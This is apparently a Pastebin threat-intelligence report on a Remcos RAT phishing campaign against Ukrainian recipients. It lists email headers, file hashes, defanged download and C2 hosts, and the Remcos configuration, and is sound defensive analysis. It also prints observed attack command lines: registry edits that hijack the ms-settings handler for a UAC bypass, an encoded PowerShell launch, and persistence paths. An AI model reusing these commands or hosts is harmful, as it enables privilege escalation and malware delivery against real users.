Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #IOC #OptiData #VR #remcos #SMB #RAT #mic #keylog #scr
- https://pastebin.com/samYnJq6
- previous_contact:
- 30/11/23 https://pastebin.com/aG6XyqHN
- 13/11/23 https://pastebin.com/tbRpiGG5
- 06/02/23 https://pastebin.com/kjv5E8Au
- 12/07/21 https://pastebin.com/ZYZarB9L
- 15/07/19 https://pastebin.com/ZxG6eRWM
- FAQ:
- https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
- attack_vector
- --------------
- email > att1 .zip > att2 + att3 .RAR > att4.RAR (pwd) > .doc (vba) > SMB \\89_23_98_22\LN\GB.exe > bitbucket_org / olegovich-007 / 777 / downloads / wsuscr.exe
- # # # # # # # #
- email_headers
- # # # # # # # #
- Date: Wed, 20 Dec 2023 22:39:50 -0800
- From: Лелюк Йоханес Вітанович <dj@benno.at>
- Subject: Заборгованість за договором Київстар – Передсудове
- Received: from mx20lb.world4you.com ([81.19.149.130])
- Received: from [94.131.102.115] (helo=98.159.36.138) by mx20lb.world4you.com with esmtpa (Exim 4.96.2)
- Reply-To: "info@kyivstar.net" <info@kyivstar.net>
- # # # # # # # #
- files
- # # # # # # # #
- SHA-256 8b48c11a538af362b766d8ccb09ef11ad6ee62bb430424c9f78d8e7cd5785b7a
- File name Заборгованість абонента.zip [ Zip archive data, at least v1.0 to extract ]
- File size 508.35 KB (520555 bytes)
- SHA-256 ca9093b05cf9e02e06f58c9819042b36b29b8461b4e8f6280bb74a76dcf3e449
- File name Заборгованість абонента.part1.rar [ RAR archive data, v5 ]
- File size 350.00 KB (358400 bytes)
- SHA-256 9f63016c2b9c83da3dca2173ca5f443d7e0e5289983c441fe064766f2da3a2ba
- File name Заборгованість абонента.part2.rar [ RAR archive data, v5 ]
- File size 157.52 KB (161301 bytes)
- SHA-256 823a799018d1ab0c2eb4c2b26d3f2eb0342fbc30eac34379903398c97d350827
- File name Заборгованість абонента.rar [RAR archive data, v5] !PWD
- File size 506.79 KB (518958 bytes)
- SHA-256 93aa6fc207df430a6e9833259e618895bcdb75c7db0850599d3dbb87d47a54c7
- File name Заборгованість абонента.doc [ MS Word Document ] !VBA
- File size 672.00 KB (688128 bytes)
- SHA-256 d698994e527111a6ddd590e09ddf08322d54b82302e881f5f27e3f5d5368829c
- File name GB.exe [ PE32+ executable ] !Loader
- File size 262.50 KB (268800 bytes)
- SHA-256 7c3476fd586bcb7f42e706f32999356fb4b2c8341f00b8297cf74131f6fa611c
- File name test2.exe [ PE32+ executable ] !Loader
- File size 172.00 KB (176128 bytes)
- SHA-256 6619b7126840529091b2da2fa1b7238d6b10bc17bbfc8327aad3683ae686b81d
- File name wsuscr.exe [ .NET executable ] !Payload - remcos
- File size 14.92 MB (15644672 bytes)
- # # # # # # # #
- activity
- # # # # # # # #
- PL_SCR bitbucket_org / olegovich-007 / 777 / downloads / wsuscr.exe
- C2 45_87_155_41 : 8080
- netwrk
- --------------
- 89_23_98_22 445 SMB2 Tree Connect Request Tree: \\89_23_98_22\IPC$
- 89_23_98_22 445 SMB2 Create Request File: GB.exe
- 104_192_141_1 443 TLSv1 bitbucket_org Client Hello
- comp
- --------------
- System TCP 89_23_98_22 445 ESTABLISHED
- powershell.exe TCP 104_192_141_1 443 ESTABLISHED
- proc
- --------------
- "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n
- C:\Windows\SysWOW64\explorer.exe "\\89.23.98.22\LN\"
- \??\UNC\89.23.98.22\LN\GB.exe "\\89.23.98.22\LN\GB.exe"
- C:\Windows\system32\cmd.exe /c res.bat && test2.exe
- C:\Windows\system32\cmd.exe /S /D /c" echo f
- C:\Windows\system32\xcopy.exe xcopy /s test2.exe "C:\TEMP\persistent2\test2.exe"
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command "[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String ...
- C:\Windows\system32\reg.exe add HKCU\Software\Classes\.omg\Shell\Open\command /d C:\Users\ADMINI~1\AppData\Local\Temp\persistent2\test2.exe /f
- C:\Windows\system32\reg.exe add HKCU\Software\Classes\ms-settings\CurVer /d .omg /f
- C:\Windows\system32\reg.exe delete HKCU\Software\Classes\.omg\ /f
- C:\Windows\system32\reg.exe delete HKCU\Software\Classes\ms-settings\ /f
- C:\Users\operator\AppData\Roaming\wsuscr.exe
- C:\ProgramData\wsus\wsus.exe
- C:\TEMP\IXP000.TMP\test2.exe
- C:\Windows\system32\cmd.exe /c "test2.bat"
- C:\Windows\system32\net.exe session
- C:\Windows\system32\net1.exe session
- persist
- --------------
- HKCU\Software\Classes\.omg\Shell\Open\command /d C:\Users\ADMINI~1\AppData\Local\Temp\persistent2\test2.exe /f
- drop
- --------------
- %temp%\test2.exe
- %appdata%\wsuscr.exe
- ProgramData\wsus\wsus.exe
- # # # # # # # #
- additional info
- # # # # # # # #
- malware_config
- {
- "Version": "4.9.3 Pro",
- "Host:Port:Password": "45_87_155_41 : 8080",
- "Assigned name": "wsus",
- "Connect interval": "1",
- "Install flag": "Enable",
- "Setup HKCU\\Run": "Enable",
- "Setup HKLM\\Run": "Enable",
- "Install path": "Application path",
- "Copy file": "wsus.exe",
- "Startup value": "Disable",
- "Hide file": "Disable",
- "Mutex": "dvwsus-SFNWWW",
- "Keylog flag": "0",
- "Keylog path": "Application path",
- "Keylog file": "logs.dat",
- "Keylog crypt": "Disable",
- "Hide keylog file": "Disable",
- "Screenshot flag": "Disable",
- "Screenshot time": "10",
- "Take Screenshot option": "Disable",
- "Take screenshot title": "",
- "Take screenshot time": "5",
- "Screenshot path": "AppData",
- "Screenshot file": "Screenshots",
- "Screenshot crypt": "Disable",
- "Mouse option": "Disable",
- "Delete file": "Disable",
- "Audio record time": "5"
- }
- other_files_from_SMB
- https://www.virustotal.com/gui/file/d698994e527111a6ddd590e09ddf08322d54b82302e881f5f27e3f5d5368829c/details
- https://www.virustotal.com/gui/file/9cd6bd7e4391a92c402118c4d4541c65a9ae4996ad2c37384967e620f2452dca/details
- https://www.virustotal.com/gui/file/961b36bb78d27b3432fae08e5c4272fe295b5e24e832c6f6bf1ec3cf87057dab/details
- https://www.virustotal.com/gui/file/efa2f3a45664c73d2283d5acc094013466de47753b795193dd37f2e54a13b34a/details
- https://www.virustotal.com/gui/file/72d683597d351182d5ceaf884e2f028eddf3bf9a53fdb166024191720efc49ff/details
- https://www.virustotal.com/gui/file/800cd06e420db368d76de6067d887fb0a801ed31b787efbfde248ff28168eb54/details
- https://www.virustotal.com/gui/file/34318cdef0cad69ba0ba6f68b42fdd5c581abdbc4feceeab73bc13c56840e7fa/details
- https://www.virustotal.com/gui/file/10cef0b0f286a3f715aaad09fa089a97c10b98cf01cbae4c702eb49c7331f461/details
- https://www.virustotal.com/gui/file/ff0a84220d028052a841312cd81baa525d19f7e4b0ce94dbbaf6634a776d3814/details
- https://www.virustotal.com/gui/file/f58add586ed2fd30ffc10eff51f55f859eff1e7870743d46a5cfdc7b76a5e308/details
- https://www.virustotal.com/gui/file/07c6deac35b7070d7d9ded3fca62d976c054c1ad8e466a822543cee33ea04437/details
- https://www.virustotal.com/gui/file/15399042016065429443742d3638917dffec34e0ae6921d4b10ba9b5c2bf4353/details
- https://www.virustotal.com/gui/file/3c8861781bc5c16b4490863e238c5dc72fbe6586a1ee36df8989e7993a9c46b3/details
- https://www.virustotal.com/gui/file/24ab05b58fefbbaddf9d332076e9f9764a3610d7985be88dd6054d68ec991618/details
- https://www.virustotal.com/gui/file/6d8628ee670cea59d5314f18aacb449b858e9194a78d4256342999798b54ad13/details
- # # # # # # # #
- VT & Intezer
- # # # # # # # #
- https://www.virustotal.com/gui/file/8b48c11a538af362b766d8ccb09ef11ad6ee62bb430424c9f78d8e7cd5785b7a/details
- https://www.virustotal.com/gui/file/ca9093b05cf9e02e06f58c9819042b36b29b8461b4e8f6280bb74a76dcf3e449/details
- https://www.virustotal.com/gui/file/9f63016c2b9c83da3dca2173ca5f443d7e0e5289983c441fe064766f2da3a2ba/details
- https://www.virustotal.com/gui/file/823a799018d1ab0c2eb4c2b26d3f2eb0342fbc30eac34379903398c97d350827/details
- https://www.virustotal.com/gui/file/93aa6fc207df430a6e9833259e618895bcdb75c7db0850599d3dbb87d47a54c7/details
- https://analyze.intezer.com/analyses/268883ca-795e-449b-98aa-3166b2384fea/behavior
- https://www.virustotal.com/gui/file/d698994e527111a6ddd590e09ddf08322d54b82302e881f5f27e3f5d5368829c/details
- https://analyze.intezer.com/analyses/113f3f5c-ddc5-4bb5-aa7b-e3d114b44a2b/behavior
- https://www.virustotal.com/gui/file/7c3476fd586bcb7f42e706f32999356fb4b2c8341f00b8297cf74131f6fa611c/details
- https://www.virustotal.com/gui/file/6619b7126840529091b2da2fa1b7238d6b10bc17bbfc8327aad3683ae686b81d/details
- VR
Add Comment
Please, Sign In to add comment